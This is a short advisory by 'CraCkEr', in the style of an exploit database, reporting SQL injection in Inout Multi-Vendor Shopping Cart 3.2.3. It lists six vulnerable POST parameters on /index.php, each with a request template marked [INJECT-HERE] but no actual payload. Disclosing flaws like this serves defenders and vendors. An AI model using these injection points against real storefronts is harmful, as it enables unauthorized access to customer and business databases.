Inout Multi-Vendor Shopping Cart 3.2.3 SQL Injection

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : inoutscripts.com                                                           │
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │
│  Software : Inout Multi-Vendor Shopping Cart 3.2.3                                     │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

  CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php


POST parameter 'val' is vulnerable to SQLI

val=All[INJECT-HERE]&category=9%20&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=


POST parameter 'category' is vulnerable to SQLI

val=All&category=9%20[INJECT-HERE]&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=


POST parameter 'startpage' is vulnerable to SQLI

val=All&category=9 &startpage=0[INJECT-HERE]&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=


POST parameter 'real_price_min' is vulnerable to SQLI

val=All&category=9 &startpage=0&real_price_min=250[INJECT-HERE]&real_price_max=34222&vendorid=0&size=&color=


POST parameter 'real_price_max' is vulnerable to SQLI

val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222[INJECT-HERE]vendorid=0&size=&color=


POST parameter 'vendorid' is vulnerable to SQLI

val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222&vendorid=0[INJECT-HERE]&size=&color=


[-] Done